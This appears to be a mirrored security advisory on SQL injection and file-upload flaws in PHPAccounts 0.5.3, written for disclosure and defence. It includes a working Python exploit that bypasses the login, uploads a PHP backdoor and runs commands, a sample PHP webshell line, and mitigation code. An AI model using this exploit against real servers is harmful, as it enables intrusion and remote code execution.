PHPAccounts SQL injection and arbitrary file upload vulnerabilities - Vulnerability Warning - Black Bar Safety Net (myhack58)

2012-06-26T00:00:00
ID MYHACK58:62201234186
Type myhack58
Reporter Anonymous
Modified 2012-06-26T00:00:00

Description

Release date: 2012-06-11

Update date: 2012-06-21

Affected system:

phpaccounts PHPAccounts 0.5.3 (version as stated in the test method below)

Description:

--------------------------------------------------------------------------------

BUGTRAQ ID: 53920

PHPAccounts is a simple Web-based accounting application aimed at small businesses, freelancers and consulting firms.

PHPAccounts contains an SQL injection vulnerability and an arbitrary file upload vulnerability; both stem from a failure to validate user-supplied data. In the test method below, the Login_Username field of the login form is injectable, and the letterhead image upload on the Preferences page accepts a .php file that is then stored under the web-accessible users/<id>/ directory. An attacker can chain the two to bypass authentication, upload and execute arbitrary code on the server, access or modify data, and go on to exploit other weaknesses in the underlying database.
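The following Python 3 snippet is an added illustration, not PHPAccounts code: the users table, column names and credentials are constructed for the demo. It shows why a login payload of the form used in the test method, `x' or '1'#`, bypasses a check that concatenates user input into SQL, and why the same inputs bound as parameters do not. The page's payload ends in MySQL's `#` line comment; the demo runs on SQLite, whose line comment is `--`, so the equivalent `x' or '1'--` is used.

```python
import sqlite3


def make_db():
    """Constructed demo table. A real application stores password hashes;
    plaintext is used here only to keep the injection mechanics visible."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (id, username, password) VALUES (?, ?, ?)",
        [(1, "admin", "s3cret"), (2, "bob", "hunter2")],
    )
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """Builds the WHERE clause by string formatting, the pattern a login form
    without input validation ends up with. Returns (row, sql) so the
    resulting statement can be inspected."""
    sql = (
        "SELECT id, username FROM users "
        "WHERE username = '%s' AND password = '%s'" % (username, password)
    )
    return conn.execute(sql).fetchone(), sql


def safe_login(conn, username, password):
    """Same check with bound parameters: the input is data, never SQL."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


# The PoC sends "x' or '1'#" (MySQL comment). The closing quote ends the
# username literal, OR '1' is always true, and the comment swallows the
# remaining " AND password = '...'" so the password is never checked.
PAYLOAD = "x' or '1'--"

if __name__ == "__main__":
    conn = make_db()
    row, sql = vulnerable_login(conn, PAYLOAD, "pwnd")
    print("vulnerable query :", sql)
    print("vulnerable result:", row)  # first row, i.e. user 1 (admin)
    print("parameterised    :", safe_login(conn, PAYLOAD, "pwnd"))  # None
    print("legitimate login :", safe_login(conn, "admin", "s3cret"))
```

The vulnerable variant returns the first row of the table regardless of the password, which is exactly what lets the test script below land in the application as user 1 before it uploads its backdoor.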

<*Source: loneferret*>

Test method:

--------------------------------------------------------------------------------

Warning

The following procedure (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!

#!/usr/bin/python
# phpAccounts 0.5.3 remote code execution PoC (loneferret / Offensive Security).
# Python 2 / mechanize script. Three steps:
#   1. bypass the login form with an SQL injection in Login_Username
#   2. upload a PHP backdoor through the letterhead image field on the
#      Preferences page (the original filename and .php extension are kept)
#   3. request the uploaded file from users/1/ with the command in ?cmd=
import re, mechanize
import urllib, sys

print "\n[*] phpAccounts v0.5.3 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
print "[*] Offensive Security - http://www.offensive-security.com\n"

if (len(sys.argv) != 3):
    print "[*] Usage: poc.py <RHOST> <RCMD>"
    exit(0)

rhost = sys.argv[1]
rcmd = sys.argv[2]

print "[*] Bypassing Login ."
try:
    br = mechanize.Browser()
    br.open("http://%s/phpaccounts/index.php?frameset=true" % rhost)
    assert br.viewing_html()
    br.select_form(name="loginForm")
    br.select_form(nr=0)
    # "x' or '1'#" closes the quoted username, ORs in an always-true
    # condition and comments out the password check (MySQL '#' comment).
    br.form['Login_Username'] = "x' or '1'#"
    br.form['Login_Password'] = "pwnd"
    print "[*] Triggering SQLi .."
    br.submit()
except:
    print "[*] Oups..Something happened"
    exit(0)

print "[*] Uploading Shell ..."
try:
    br.open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost)
    assert br.viewing_html()
    br.select_form(nr=0)
    br.form["Preferences[LETTER_HEADER]"] = 'test'
    # backdoor.php must exist in the current directory; it is sent as the
    # letterhead image and lands, unmodified, in users/<id>/backdoor.php
    br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="letterhead_image")
    br.submit(nr=2)
except:
    print "[*] Upload didn't work"
    exit(0)

print "[*] Command Executed\n"
try:
    # user id 1 is assumed (the account the SQLi logged us in as);
    # the command is URL-encoded so spaces and shell metacharacters survive
    shell = urllib.urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost, urllib.quote(rcmd)))
    print shell.read()
except:
    print "[*] Oups."
    exit(0)

Recommendations:

--------------------------------------------------------------------------------

Vendor patch:

phpaccounts

-----------

The vendor has not yet released a patch or upgrade procedure. Users of this software are advised to follow the vendor's home page for the latest version:

http://phpaccounts.com/

Until a fix is available, the two steps the test method relies on can be mitigated independently: the login check should use parameterized queries rather than string concatenation, and the letterhead upload should accept only image types, stored under a server-chosen name (ideally outside the web root), so that an uploaded .php file is never written to a web-served directory and executed.
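As an added example of the upload-side mitigation (this is not PHPAccounts code, and the allow-list, helper names and sample files are constructed for the demo), the Python 3 code below shows the server-side check that would have stopped the test method's second step: the client-supplied name only contributes an extension, that extension must be on an image allow-list, the content must carry the matching file signature, and the stored name is chosen by the server, so neither backdoor.php nor a renamed backdoor.png ends up as an executable file under users/<id>/.

```python
import os
import secrets
import tempfile

# Allow-list for the letterhead image field (constructed for this demo):
# extension -> file signatures that must appear at offset 0.
ALLOWED_SIGNATURES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# Constructed sample uploads: a PHP command shell of the kind the PoC sends
# as backdoor.php, and a minimal buffer carrying only a PNG signature.
PHP_BACKDOOR = b"<?php system($_GET['cmd']); ?>\n"
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


class UploadRejected(ValueError):
    pass


def check_upload(client_filename, data):
    """Return None if the upload is acceptable, else a rejection reason.

    Only the extension is taken from the client-supplied name (any directory
    part is dropped); the content must start with the matching image
    signature, so renaming backdoor.php to backdoor.png is not enough.
    """
    name = os.path.basename(client_filename)
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_SIGNATURES:
        return "extension %r not in allow-list" % ext
    if not any(data.startswith(sig) for sig in ALLOWED_SIGNATURES[ext]):
        return "content does not start with a %s signature" % ext
    return None


def stored_name(client_filename, data):
    """Server-chosen name for an accepted upload: random token plus the
    vetted extension. The client controls neither the stored path nor the
    extension, so a double extension such as x.php.png never yields a .php
    file on disk."""
    reason = check_upload(client_filename, data)
    if reason is not None:
        raise UploadRejected(reason)
    ext = os.path.splitext(os.path.basename(client_filename))[1].lower()
    return secrets.token_hex(16) + ext


def store_upload(client_filename, data, upload_root):
    """Write the vetted upload under upload_root, which should sit outside
    the document root and be served by a handler that returns the bytes
    with an image Content-Type rather than handing them to PHP."""
    path = os.path.join(upload_root, stored_name(client_filename, data))
    with open(path, "wb") as fh:
        fh.write(data)
    return path


if __name__ == "__main__":
    root = tempfile.mkdtemp()
    for fname, blob in [("backdoor.php", PHP_BACKDOOR),
                        ("backdoor.png", PHP_BACKDOOR),
                        ("letterhead.png", PNG_STUB)]:
        try:
            print(fname, "->", store_upload(fname, blob, root))
        except UploadRejected as exc:
            print(fname, "rejected:", exc)
```

The signature check is a cheap filter, not a guarantee that the bytes are a harmless image; the property that actually closes the hole is that the stored file has a server-chosen name with an image extension in a directory the web server never executes scripts from.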